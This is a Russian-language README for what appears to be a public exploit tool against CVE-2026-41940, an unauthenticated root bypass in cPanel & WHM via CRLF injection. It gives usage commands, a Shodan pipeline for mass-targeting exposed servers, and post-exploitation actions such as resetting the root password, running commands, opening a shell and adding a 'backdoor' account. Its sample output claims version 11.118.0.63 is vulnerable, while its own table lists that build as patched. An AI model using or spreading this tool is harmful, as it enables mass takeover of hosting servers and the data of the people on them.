
cPanel & WHM — обход аутентификации через CRLF-инъекцию в файле сессии
⚡ Неаутентифицированный root – CRLF-инъекция в session-файл ⚡
«Одна цепочка, чтобы править всеми».
┌─────────────────────────────────────────────────────────────┐
│ Этап 1 ── Создание pre‑auth cookie сессии │
│ Этап 2 ── CRLF-инъекция через заголовок `Authorization`│
│ Этап 3 ── Запуск гаджета `do_token_denied` (raw → cache)│
│ Этап 4 ── Проверка root-доступа к WHM через JSON API │
└─────────────────────────────────────────────────────────────┘
💥 Результат – Полный root-доступ к WHM без каких-либо учётных данных.
Этот проект выпущен под лицензией MIT – можете свободно использовать, изменять и распространять, но не будьте злыми 😈.
Подробности см. в файле LICENSE.
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940
Ноль зависимостей – только стандартная библиотека Python 3.
Вам не нужныpip,virtualenvили прочая ерунда.
./CVE-2026-41940.py -u https://target.com:2087
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30
После того как вы взломали систему, вы можете:
--action list--action passwd --passwd "h4ck3d!"--action cmd --cmd "id;whoami"--action shell (полный терминал WHM)--action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"cat /etc/passwd--action info$ ./CVE-2026-41940.py -u https://192.168.1.100:2087
Конфигурация:
Целей : 1
Потоков : 10
Таймаут : 15s
Действие : только сканирование
[10:23:15] [SCAN] Запуск цепочки эксплойта из 4 этапов... https://192.168.1.100:2087
[10:23:15] [INFO] Обнаружено каноническое имя хоста: server.example.com
[10:23:15] [STEP] Этап 1/4 — Создание preauth-сессии...
[10:23:16] [ OK] Этап1: preauth-сессия = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Этап 2/4 — CRLF-инъекция через заголовок Authorization...
[10:23:17] [ OK] Этап2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Этап 3/4 — Запуск гаджета do_token_denied (raw→cache)...
[10:23:18] [ OK] Этап3: HTTP 401 — гаджет do_token_denied запущен
[10:23:18] [STEP] Этап 4/4 — Проверка root-доступа к WHM...
[10:23:18] [INFO] Этап4: HTTP 200 {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 ПОДТВЕРЖДЁН — root-доступ к WHM! (v11.118.0.63 — ПОДТВЕРЖДЕНО уязвим)
[10:23:18] [PWND] Token : /cpsess1234567890
[10:23:18] [PWND] Сессия : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND] Версия : 11.118.0.63
[10:23:18] [PWND] URL API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
CVE-2026-41940 — Сканирование завершено
Время: 3.2s · Целей: 1
1 УЯЗВИМАЯ ЦЕЛЬ (ЦЕЛИ)
[*] Цель : https://192.168.1.100:2087
[*] Версия : 11.118.0.63
[*] Token : /cpsess1234567890
[*] URL API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
[*] Сессия : 9a7f8e3d2c1b0a9f
[*] Доказательство : {"version":"11.118.0.63",...}
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
Все версии ниже этих сборок уязвимы.
0xgh057r3c0n – исследователь безопасности, реверс-инженер и кофеман.
GitHub | Twitter
Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.
Несанкционированный доступ к компьютерным системам незаконен. Автор и участники не несут ответственности за любое неправомерное использование или ущерб, причинённый этим программным обеспечением.
Используйте ответственно и всегда сначала получайте разрешение.
🔥 Взламывайте планету, но оставайтесь в рамках закона. 🔥
| Флаг | Описание |
|---|
-u, --url | URL одиночной цели (например, https://host:2087) |
-l, --list | Файл с одним URL на строку |
--hostname | Переопределить канонический заголовок Host (автоопределяемый) |
-t, --threads | Количество потоков (по умолчанию: 10) |
--timeout | Таймаут в секундах (по умолчанию: 15) |
--rate-limit | Пауза между целями (в секундах) |
--action | Пост-эксплуатация: list, passwd, cmd, exec, info, version, shell, adduser |
--passwd | Новый root-пароль (с --action passwd) |
--cmd | Команда ОС (с --action cmd/exec) |
--new-user | Новое имя пользователя cPanel (с --action adduser) |
--new-domain | Новый домен cPanel (с --action adduser) |
-o, --output | Сохранить результаты в JSON |
| Ветка | Исправленная сборка | Статус |
|---|
| 11.110 | 11.110.0.97 | 🛡️ Исправлено |
| 11.118 | 11.118.0.63 | 🛡️ Исправлено |
| 11.126 | 11.126.0.54 | 🛡️ Исправлено |
| 11.132 | 11.132.0.29 | 🛡️ Исправлено |
| 11.134 | 11.134.0.20 | 🛡️ Исправлено |
| 11.136 | 11.136.0.5 | 🛡️ Исправлено |